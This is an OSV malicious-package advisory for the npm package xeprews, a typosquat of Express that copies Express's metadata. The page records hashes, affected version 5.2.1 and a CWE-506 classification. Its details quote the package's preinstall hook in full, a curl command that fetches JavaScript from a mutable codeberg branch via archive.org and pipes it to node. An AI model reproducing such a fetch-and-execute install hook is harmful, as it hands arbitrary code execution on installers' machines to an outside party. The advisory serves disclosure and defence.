MAL-2026-17248

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/xeprews/MAL-2026-17248.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17248
Published
2026-09-29T14:40:06Z
Modified
2026-09-29T15:00:05Z
Summary
Malicious code in xeprews (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (17facf9b3612b1338fbda61069db829317150a9e7dbcc38cf96abbee1baa29b2)

xeprews is an Express typosquat whose package.json declares a preinstall lifecycle hook that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching a JavaScript file from a third-party mutable branch (no commit pin, no integrity check) and executing it under Node on the installer's machine at npm install time. The package impersonates expressjs/express by copying its author, repository, homepage, and description metadata, and ships only a stub index.js that re-exports './lib/express'; the impersonation is the lure that induces the install and thereby the remote code execution. Whoever controls the codeberg branch (or the archive.org replay of it) controls arbitrary code execution on every installer.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020630",
            "import_time":  "2026-09-29T14:44:37.282975363Z",
            "modified_time":  "2026-09-29T14:40:06Z",
            "sha256":  "17facf9b3612b1338fbda61069db829317150a9e7dbcc38cf96abbee1baa29b2",
            "source":  "amazon-inspector",
            "versions":  [
                "5.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / xeprews

Package

Affected ranges

Affected versions

5.*
5.2.1

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "4c2a000aa786ae63605c3b66e8e3366d91f3220c8bcce7915ad438be535f24ca",
            "tlsh":  "6951da21cc0e8c6326c5a2dd3c68a542616188078e41f81cf769539c8f8e56f71b9fbf"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "xeprews-5.2.1.tgz",
            "hashes":  {
                "sha1":  "3278b86e26ecbe57a6a5a5216b8ed4655d4b21dd",
                "sha512_sri":  "sha512-LvmzJ/7aoujfXcp+LCjYs+DCani42ox+4gyaGrd0I2BLACD630Jx8mbgypRzIQB0UICgwGMdlyg0ENLqTwUXbw=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/xeprews/MAL-2026-17248.json"